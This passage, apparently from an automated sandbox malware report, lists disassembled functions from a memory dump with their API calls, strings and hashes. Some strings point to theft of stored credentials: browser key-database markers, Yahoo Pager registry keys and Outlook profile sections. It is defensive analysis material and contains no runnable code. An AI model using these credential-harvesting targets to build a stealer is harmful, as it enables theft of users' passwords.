                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                                                                                                • memcmp.MSVCRT ref: 0040617C
                                                                                                                • memcmp.MSVCRT ref: 004061A4
                                                                                                                • memcpy.MSVCRT ref: 004061C1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmp$memcpy
                                                                                                                • String ID: global-salt$password-check
                                                                                                                • API String ID: 231171946-3927197501
                                                                                                                • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                                                                                • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                                                                                • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 19018683-0
                                                                                                                • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040644F
                                                                                                                • memcpy.MSVCRT ref: 00406462
                                                                                                                • memcpy.MSVCRT ref: 00406475
                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                                                                                                • memcpy.MSVCRT ref: 004064B9
                                                                                                                • memcpy.MSVCRT ref: 004064CC
                                                                                                                • memcpy.MSVCRT ref: 004064F9
                                                                                                                • memcpy.MSVCRT ref: 0040650E
                                                                                                                  • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 438689982-0
                                                                                                                • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0044495F
                                                                                                                • memset.MSVCRT ref: 00444978
                                                                                                                • memset.MSVCRT ref: 0044498C
                                                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                • strlen.MSVCRT ref: 004449A8
                                                                                                                • memcpy.MSVCRT ref: 004449CD
                                                                                                                • memcpy.MSVCRT ref: 004449E3
                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                • memcpy.MSVCRT ref: 00444A23
                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset$strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2142929671-0
                                                                                                                • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                • memset.MSVCRT ref: 0040330B
                                                                                                                • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                • strchr.MSVCRT ref: 0040335A
                                                                                                                  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                • strlen.MSVCRT ref: 0040339C
                                                                                                                  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                • String ID: Personalities
                                                                                                                • API String ID: 2103853322-4287407858
                                                                                                                • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410863 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                • memcpy.MSVCRT ref: 004108C3
                                                                                                                Strings
                                                                                                                • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromStringUuid$memcpy
                                                                                                                • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                • API String ID: 2859077140-3316789007
                                                                                                                • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00444573
                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValuememset
                                                                                                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                • API String ID: 1830152886-1703613266
                                                                                                                • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                                • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                                • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessagesprintf
                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                • API String ID: 1670431679-1552265934
                                                                                                                • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: H
                                                                                                                • API String ID: 2221118986-2852464175
                                                                                                                • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                • API String ID: 3510742995-3170954634
                                                                                                                • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmp$memcpy
                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                • API String ID: 231171946-3708268960
                                                                                                                • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID: winWrite1$winWrite2
                                                                                                                • API String ID: 438689982-3457389245
                                                                                                                • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: winRead
                                                                                                                • API String ID: 1297977491-2759563040
                                                                                                                • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: gj
                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AB66 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                                • memset.MSVCRT ref: 0040AB9C
                                                                                                                  • Part of subcall function 00411004: memcpy.MSVCRT ref: 00411072
                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                • API String ID: 3337535707-2769808009
                                                                                                                • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 004090C2
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4247780290-0
                                                                                                                • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                  • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                  • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                  • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                  • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                                                • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                                                • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                • String ID:
                                                                                                                • API String ID: 2374668499-0
                                                                                                                • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AD38 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040AD5B
                                                                                                                • memset.MSVCRT ref: 0040AD71
                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                Strings
                                                                                                                • <%s>, xrefs: 0040ADA2
                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                Memory Dump Source
